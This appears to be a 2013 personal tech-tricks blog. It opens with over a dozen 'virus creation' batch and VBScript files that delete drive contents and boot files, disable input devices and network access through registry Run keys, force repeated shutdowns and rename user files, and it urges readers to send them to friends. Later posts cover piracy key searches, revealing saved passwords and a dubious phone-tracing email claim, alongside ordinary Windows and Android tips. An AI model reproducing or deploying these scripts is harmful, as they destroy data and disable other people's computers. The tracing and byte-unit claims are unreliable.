Sunday, December 29, 2013

Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Then Save this file as virus.bat
3. Now, running this file format C Drive.

#Vishal Jadhav
Make A Virus That Disable Mouse

Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Save this file as virus.bat

Done you just created your virus.


#Vishal Jadhav
Create Virus on Notepad
1 -> Virus Creation Tricks 1

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension .

2 -> Virus Creation Trick 2 .
Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.

3 -> Virus Creation Trick 3
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

4 -> Virus Creation Trick 4
Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

5 -> Virus Creation Trick 5
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

6 -> Virus Creation Trick 6
This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

7 -> Virus Creation Trick 7
This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP

@Echo off
Del C: *.* |y

Save It As Anything.bat

9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

11 -> Virus Creation Trick 11
Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File

12 -> Virus Creation Trick 12
Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


13 -> Virus Creation Trick 13
System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File

Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !


#Vishal Jadhav 

only for educational purpose

Wednesday, December 25, 2013

SIMPLE way to see the password behind asterisks

All you need to do is highlight and right click the password field of the target page, and click "Inspect Element".

For something like Facebook, here's how it would look:


Code:
<input type="password" class="inputtext" name="pass" id="pass" tabindex="2">

Now change the type="password" to type="text"

Spoiler (Click to View)

And there you have it!
Unfortunately I couldn't show the password being revealed in real time since they are just images but you can test it out in the matter of seconds and see it work.

I've tested this with Yahoo, Gmail, YouTube and Facebook so I'm sure it works with various other sites as well.

Tested with Firefox and Chrome


#Vishal Jadhav
Use Pen drive as ram

1. Insert your pen-drive. Let your PC read it.(Minimum 2 GB)
2. Right click on My Computer. ( Click on Properties from context menu)
3. Click on Advanced tab.
4. Click on Settings under Performance.
5. Click on Advanced tab.
6. Click on Change button under Virtual memory.
7.Select your USB drive.
8.Click on custom size radio button and give the values as follows;
Initial Size:1020
Maximum size:1020
The size depends upon your free memory capacity of your pen drive. So you can change this limit according to your pen drive size.
9.Click on Set button, then click on OK.
10. Now you have to restart the computer. (The speed of your computer will be increased)


#Vishal Jadhav
Basic tips for Secure Browsing

1. Never keep same password for different services you use online like gmail , facebook, bank accounts etc.,

2. Use multiple accounts so that you dont get spams in your personal/ official email address.

3. Install good Antivirus and Two way firewall.

4. Use VPN for hiding identity and secure browsing when using internet out of your home.

5. Update your OS, Antivirus, Firewall and Browsers regularly.

6. Install a good spyware & Adware scanner .

7. Never provide personal information openly in public websites. Share your information carefully.

8. Never click on unwanted or suspiicious links. It may be hacking attempt.

9. Change your passwords regularly to increase the security of your daily actiivities.


#Vishal Jadhav
How to Hack Memory card password
Hi friends! if you really want to hack any memory card's password from heart, you can try this trick. 
To hack the password, follow these steps-

1> open C:\System by using any file explore (where 'C:\' is ur memcard drive letter)

2> rename 'mmcstore' as 'mmcstore.txt'

3> open that file. There you can see the password. 

#Vishal Jadhav

Saturday, December 21, 2013

Trace ur stolen phone
==========================================

Hello visitor today I am going to share a very useful info which teach you how to trace your mobile phone if its being lost or stolen,,
As we all know that mobile is become the one of the most important part of our life and without it life become non communicative.. so follow the below some simple steps to trace ur mobile phone if it is lost.. or stolen

This is how it works!

1. Dial : *#06# from your mobile.

2. Your mobile shows a unique 15 digit.

3. Note down this no. anywhere but except your mobile as this is the no. which will help trace your mobile in case of a theft.

4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net

5. No need to go to police.

6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.

7. You will find where your hand set is being operated even in case your no. is being changed.

If u lost your mobile, send an e-mail to cop@vsnl.net

With the following info:

Your name:
Address:
Phone model:
Make:
Last used No.:
E-mail for communication:
Missed date:
IMEI No.:

Keep all these information stored for emergency use..

*NOTE* - if above doesnt works than try to report @www.trackimei.com

10 best android secret tips 


 Android is the Linux based operating system designed primarily for touch screen mobile phones. Now a days android phones are so much popular that they covered almost 65% of total mobile phones market.They are rich in functionality as well as user friendly. Many android users don’t know much about the hidden features of android phones. Today we are sharing an article which will tell you the best secret android tricks and hidden features of android phones. Different versions of android versions support different set of android tricks, so try all the following android tricks. I am not sure which will going to work on your handset.



 1) Force reboot: Many times android users face a problem of freezing of mobile phone, In case your android phone is frozen, you can reboot it using an android trick.

Just press Power Button+ Home Key + Volume up button simultaneously.

2) Quick Google Access:
Android phones built primarily for internet, many of android users don’t know that android phones provide a way by which we can access Google search in just a single click. To use this android trick, 

Press menu key and hold it for couple of seconds, it will launch the Google search.

3) Reboot Android in safe mode: 
As like computers, we can also reboot android phones in safe mode. The latest androidjelly bean version provides an option to reboot in safe mode, if something goes wrong. 
To reboot your android in safe mode, follow the below given instructions.
*Long press the power button 
*Long press on the power off option.

Android phone will show a confirmation message about rebooting it in safe mode, if we reboot android phone in safe mode then all the 3rd party application will be disabled. These applications can again be enabled when we reboot our phone normally. This is a great android utility in case when, one of your 3rd party application is causing trouble for you and you want to hunt it.

4) Unlock android phones by face detection: This is a cool android trick by which you can unlock your phone by using face detection, In the jelly bean version, android provides a way by which android phone can be unlock using face detection, to make this feature more secure, jelly bean version added another layer of protection in which android phone can be unlocked only when the face is matched as well as we have to blink eyes in order to unlock phone. Blinking eyes tells the android security system that person is live and it’s not an illegal attempt of unlocking using a still image.
To activate this,

Go to Settings > Security > Screen lock > Face unlock.

5) Get detailed information about phone status:
We can get the detailed statistics like phone information, battery information, usage statistics and WiFi information by just dialing *#*#4636#*#*
This is a handy USSD to get the details about battery usage, DNS check, Ping, Application time usage time and so on.

6) Move android apps to SD cardIts good idea to install android apps in SD card, but what if you installed apps on your phone memory. Don’t worry android phones provide a way by which we can move our apps to SD card. To move apps to SD card, follow these steps:

Go to settings > Application settings > Manage application > Select the application, You will see the option “Move to SD card”.

7) Hard Reset and Factory reset your android phone: 
This android trick comes handy at the time of selling an android phone. Android phone can be formatted in two ways


  • Factory reset
  • Hard reset
a) Factory reset: In factory reset, your phone is being formatted to factory level. Means all the settings will go by default and all the internal data will be deleted. To factory reseta phone dial *#*#7780#*#*.

b) Hard reset: 
To hard reset a phone dial *2767*3855#, this will delete all the data (including internal and External SD data) as well as settings of android phone. Don’t try this code for testing purpose, until you are not sure. It will not ask for a confirmation.

8) Context menu in android:long press on the screen, will show you additional options for customizing android phones. This context menu is somewhat similar to the right click menu of most operating systems.

9) Taking screen shots on android phone:
 Android phones offer a great feature by which we can take the screen shot without using any 3rd party application. However the screen shot android tricks vary from one android version to another version.


  • Press the Home button + power button (This trick work on most android phones.)
  • For Galaxy Nexus: Power button + volume down button.
  • For Galaxy Note 2 and S3: Swipe your palm on the screen to take screen shot.

10) Android Version Animation: 
This is another cool android trick to play with your android phone. 
To use this android trick, Go to settings > about phone > Tab repeatedly on ‘Android version’.
After sometime, the android version will be animated.

#vishal
C program to shutdown windows7 :

# include <stdio.h>
# include <stdlib.h>
main ()
{
char ch ;
printf ("Do you want to shutdown your computer now (y/n) \n ") ;
scanf ( "%c" ,& ch ) ;
if ( ch == 'y' || ch == 'Y' )
system ( "C: \\ WINDOWS\\ System32 \\ shutdown /s" ) ;
return 0 ;
}


#vishal
Trick : How to Show Your Name after time in Taskbar !

Its Very Simple !
Step 1 : Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok !
Did It change? Then Ok..
If not, Go with the Next Step...
Step 2 : Now go to time in taskbar and Double Click it toopen "Date and time property"
Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to change the AM or PM by selecting and press arrow. It will Show ur name or name that was entered then , Apply -> OK !


#vishal
How To Create Undeletable And Unrenamable Folders ?
1. Go to Start and then Click on Run
-Type cmd & hit enter (To open Command Prompt ).
2. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
3. Type D: or E: and hit enter
4. Type md con\ and hit enter (md - make directory)
5. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
6. Open that directory, you will see the folder created of name con.
7. Try to delete that folder or rename that folder windows will show the error message.
Now the question is how to delete it when you really need to do?
1. Open Command Prompt
2. Type D: ( if u created this type of folder in D: drive) & hit enter Type rd con\ (rd - remove directory)
3. Open that directory and the folder will not appear because it is removed.
How To Create Undeletable And Unrenamable Folders ?
1. Go to Start and then Click on Run
-Type cmd & hit enter (To open Command Prompt ).
2. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
3. Type D: or E: and hit enter
4. Type md con\ and hit enter (md - make directory)
5. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
6. Open that directory, you will see the folder created of name con.
7. Try to delete that folder or rename that folder windows will show the error message.
Now the question is how to delete it when you really need to do?
1. Open Command Prompt
2. Type D: ( if u created this type of folder in D: drive) & hit enter Type rd con\ (rd - remove directory)
3. Open that directory and the folder will not appear because it is removed.


#vishal
*** HOW TO FIND SERIAL KEYS FROM GOOGLE***

steps:-
1) go to google.com

2) write the name of the software you want key
and add 94FBR at the end
Eg :- if you want to find key of IDM then write "
IDM 94FBR " (without quotes)

3) search it and you will find many sites with
serial keys of that softwares
DONE !!!!


#Vishal 

Sunday, October 27, 2013

1 Bit = Binary Digit
8 Bits = 1 Byte
1024 Bytes = 1 Kilobyte
1024 Kilobytes = 1 Megabyte
1024 Megabytes = 1 Gigabyte
1024 Gigabytes = 1 Terabyte
1024 Terabytes = 1 Petabyte
1024 Petabytes = 1 Exabyte
1024 Exabytes = 1 Zettabyte
1024 Zettabytes = 1 Yottabyte
1024Yottabytes = 1 Brontobyte
1024 Brontobytes = 1 Geopbyte
1024 Geopbyte=1 Saganbyte
1024 Saganbyte=1 Pijabyte
Alphabyte = 1024 Pijabyte
Kryatbyte = 1024 Alphabyte
Amosbyte = 1024 Kryatbyte
Pectrolbyte = 1024 Amosbyte
Bolgerbyte = 1024 Pectrolbyte
Sambobyte = 1024 Bolgerbyte
Quesabyte = 1024 Sambobyte
Kinsabyte = 1024 Quesabyte
Rutherbyte = 1024 Kinsabyte
Dubnibyte = 1024 Rutherbyte
Seaborgbyte = 1024 Dubnibyte
Bohrbyte = 1024 Seaborgbyte
Hassiubyte = 1024 Bohrbyte
Meitnerbyte = 1024 Hassiubyte
Darmstadbyte = 1024 Meitnerbyte
Roentbyte = 1024 Darmstadbyte
Coperbyte = 1024 Roentbyte


#vishal
is your computer working slow??? 
seriously ... it annoys very much..!! 
so.. here is an awesome trick to make ur computer much faster... and it world on all OS's like windows XP, vista,7,8.... etc... 

just follow these simple steps.. 

1. Uninstall unwanted applications
If you installed more software's in your
computer actually it's getting slow. so
if have unwanted programs in your list
uninstall all ofthem. To do it follow
below steps.
• In Windows XP, go to Start -> Control
Panel -> Add/Remove Programs
• In Windows 7 and Vista, go to Start ->
Control Panel -> Programs ->
Programs and Features
• In Windows 8 go to Settings ->
Control Panel -> Programs and
Features...

2. Remove junk files
You don't even have to click a "Save"
button once while using your computer
to accumulate junk files. Simply
checking emails, setting your computer
to hibernate or surfingthe web will build
up junk files on your computer. You can
remove your PC junk files using
Windows inbuilt "Disk Cleanup" utility.
• In Windows XP, Vista and 7 go to Start
-> All Programs -> Accessories ->
System Tools -> Disk Cleanup
• In Windows 8 Press Win+R and type
Cleanmgr.exe on run. now press Enter..

3. Disabling auto-start applications
Many programs will set themselves to
auto-start when you boot your
computer, even though you might only
use them once a month. These
background applications can take up a
lot of RAM and they make your PC
toslow. That's why disabling the auto-
start option for programs you don’t
need can do a lot to speed up your
computer. Follow this steps to stop
unwanted startup programmes.
• In Windows XP go to Start -> Run ->
and type msconfig on run -> go to
Startup tab. now you can uncheck
unwanted startup programmes.
• In Windows Vista and 7 simply type
msconfig in the search box in the Start
menu
• In Windows 8 Press Win+R and type
msconfig on run...

4. Repair and defragment the registry
It is possible to repair registry errors
yourself if you are a very experienced
computer user or have a know the
exact origin of your problem and step-
by-step instructions to fix it. But many
computer users can't repair registry
errors themselves. So you can
download third party software to do it.
PC Tools Registry Mechanic is one of
the best registry repair software..

5. Removing malware
Malware can also slow down your
computer, running in the background
and taking up system resources. To
speed up your computer, install a good
anti-malware product and set it to
auto-update and run scheduled scans.
There have many softwares to do it. I'm
recommend Malwarebytes Anti-
malware to do it.... 


#vishal
windows 8 Tips, Tricks and Shortcuts !!!

Customize your tile
Make the most of your Windows Start screen tiles by adjusting the sizes, where they are located, and what is listed.

Move any tile by clicking and dragging the tile. While moving a tile, if you need a larger view of the Start screen move the tile towards the top or bottom of the screen to zoom out.

Use your mouse wheel to scroll left-to-right through your tiles.
Any Desktop shortcut or program can be pinned to the Start screen by right-clicking the icon and choosing Pin to Start.

In the bottom right-hand corner of the start screen is a magnifying glass with tiles, click this icon to get a zoomed out view of your Start screen. In this view, if you right-click on a group of tiles you'll be given the option to name group, which can be useful if you have a group of related tiles (e.g. games). In this view, you can also click and drag a group to organize your tile groups.

Create a new speed bump between tile groups by moving a tile to a speed bump.

Resize any User tile or Live tile by right-clicking the tile and choosing resize.

If there is a tile you want on your Taskbar, right-click the tile and choose Pin to taskbar.

Show admin applications on the Start screen by clicking Settings in Charms, click Settings, and change the Show administrative tools from No to Yes.

In Internet Explorer 10, you can also pin any of your favorite web pages to your Start Screen.

Keyboard shortcuts

Press the Windows Key to open the Start screen or switch to the Desktop(if open).
Press the Windows key + D will open the Windows Desktop.
Press the Windows key + . to pin and unpin Windows apps on the side of the screen.
Press the Windows key + X to open the power user menu, which gives you access to many of the features most power users would want (e.g. Device Manager and Command Prompt).
Press the Windows key + C to open the Charms.
Press the Windows key + I to open the Settings, which is the same Settings found in Charms.
Press and hold the Windows key + Tab to show open apps.
Press the Windows key + Print screen to create a screen shot, which is automatically saved into your My Pictures folder.

Know your hot corners
The corners on your screen are hot corners and give you access to different Windows features. Below, is a brief explanation of each of these corners.

Bottom Left-hand corner
The bottom left-hand hot corner of the screen will allow you to access the Start screen, if you're in the Start screen and have the Desktop open, this corner will open the Desktop from the Start screen.
Tip: Right-clicking in the left hand corner will open the power user menu.

Top-left corner of the screen
Moving the mouse to the top-left corner and then down will display all the apps running on the computer. Clicking and dragging any of these apps to the left or right-hand side of the screen will snap that app to that side of the screen. Each of these open app icons can also be right-clicked to close or snap.

Right-hand side of the screen
On the full right-hand side of the screen will be given access to the Windows Charms.

Advantage of search
The Search in Windows 8 has been significantly improved when compared to all previous versions of Windows. To search for a file or run a program in Windows 8 from the Start screen just start typing what you're trying to find or want to run.
As you begin typing, the results will start appearing on the left-hand side. In addition to being able to search for files and run programs, the Search also supports limiting the search to apps such as Finance, People, Maps, Photos, Mail, Music, Videos, Weather, and much more. If what you are searching for is not a file or program, click on the app you wish to use as the search. For example, if you were searching for "New York" and selected the Weather App you would be shown the weather in New York, NY.By default, Search organizes the available Apps by how frequently they are used and then in alphabetical order. If you want to keep your favorite app at the top of the Search list, right-click the app and choose Pin. Pinning the app will lock it in place regardless of how often it is used. If there is an app you don't want you can turn on and off any of the search apps through the PC settings, which is found under the Settings in the Charms.

The Search is also found through Charms and can also be opened by pressing Windows key + F.

Running two apps side by side
Any app can be pinned to the left or right-hand side of the screen. For example, open the People app and then press the Windows Key + . (period) to move that app to the right-hand side of the screen, pressing the same keys again will move it to the left-hand side, and pressing the same keys again will make it full screen. While an app is pinned, any other app or program can be opened and loaded into the available space on the screen.Any open app can also be pinned using your mouse by clicking at the top of the tile and dragging it to the left or right-hand side of the screen.
The Desktop can also be pinned to the left or right-hand side of the screen.
In order for snap to work properly your resolution must be at least 1,366 x 768.

Windows 8 Task Manager
The Windows 8 Task Manager has been significantly improved over previous versions of Windows. Some of the new changes include showing a total percent usage at the top of your Processes, which makes it easier to determine total memory and CPU usage, improved Performance graphs, a Startup tab to see startup processes and their impact to system performance, and the App history tab (as shown below) that gives you the total resources an app has used over a period of time. Press Ctrl + Shift + Esc to start exploring the new Task Manager.

Use a picture password to log into your computer
Windows 8 includes a new feature called Picture Password, which allows you to authenticate with the computer using a series of gestures that include circles, straight lines, and taps. Enable this feature if you want a new way to access your computer or have a hard time with passwords.
Open the Windows Charms.
Click Settings and then More PC settings
In the PC settings window click Users and then select Create a picture password
A four digit pin password can also be created and used to access your computer.

Take advantage of Windows 8 apps

Microsoft touts the People feature in Windows 8 because they understand how many people are using social networks today. In the People feature you'll be able to connect your Windows computer to all the major social networks including Facebook, LinkedIn, and Twitter. Once connected, you can pin the people app and monitor your social network (as shown below), use People in Search to find people, and get an overview of what is happening in all your social networks.

Reader
The Reader app will give you PDF support right out of the box.

SkyDrive
The SkyDrive app will give you access to the Microsoft cloud service SkyDrive, which allows you to store your photos, documents, and other files in the cloud and access or share those files with any computer with Internet access.

Store
Take advantage of the Windows Store and install one or more of the thousands of available apps designed for Windows 8. The Store is found in the Start screen, or use Search to search the Store app for any apps that you are trying to find.


#vishal